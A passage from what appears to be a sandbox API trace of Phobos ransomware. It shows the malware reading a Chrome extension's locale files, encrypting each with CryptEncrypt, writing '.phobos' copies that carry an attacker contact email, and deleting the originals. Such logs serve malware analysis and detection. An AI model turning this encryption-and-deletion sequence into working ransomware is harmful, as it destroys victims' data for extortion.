HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json")) returned 0x2020 [0154.853] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.853] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.853] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.854] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.854] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12c, lpOverlapped=0x0) returned 1 [0154.854] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0154.854] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0154.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.855] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.855] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.855] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.855] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.856] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.856] CloseHandle (hObject=0x14c) returned 1 [0154.856] CloseHandle (hObject=0x130) returned 1 [0154.856] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json")) returned 1 [0154.857] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.858] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=203) returned 1 [0154.858] CloseHandle (hObject=0x130) returned 1 [0154.858] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json")) returned 0x2020 [0154.858] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.858] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.858] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.858] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.858] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcb, lpOverlapped=0x0) returned 1 [0154.859] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.859] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.860] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.860] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.860] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.860] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.860] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.860] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.860] CloseHandle (hObject=0x130) returned 1 [0154.860] CloseHandle (hObject=0x14c) returned 1 [0154.861] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json")) returned 1 [0154.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.862] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=523) returned 1 [0154.862] CloseHandle (hObject=0x14c) returned 1 [0154.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json")) returned 0x2020 [0154.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.862] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.862] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.862] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x20b, lpOverlapped=0x0) returned 1 [0154.863] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210, dwBufLen=0x210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210) returned 1 [0154.863] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x210, lpOverlapped=0x0) returned 1 [0154.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.864] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.864] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.864] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.864] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.864] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.864] CloseHandle (hObject=0x14c) returned 1 [0154.865] CloseHandle (hObject=0x130) returned 1 [0154.865] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json")) returned 1 [0154.865] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.866] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=177) returned 1 [0154.866] CloseHandle (hObject=0x130) returned 1 [0154.866] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json")) returned 0x2020 [0154.866] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.866] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.866] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.867] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.867] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb1, lpOverlapped=0x0) returned 1 [0154.868] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.868] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.869] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.869] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.869] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.869] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.869] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.869] CloseHandle (hObject=0x130) returned 1 [0154.869] CloseHandle (hObject=0x14c) returned 1 [0154.869] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json")) returned 1 [0154.870] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.872] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=150) returned 1 [0154.872] CloseHandle (hObject=0x14c) returned 1 [0154.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json")) returned 0x2020 [0154.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.872] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.872] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: 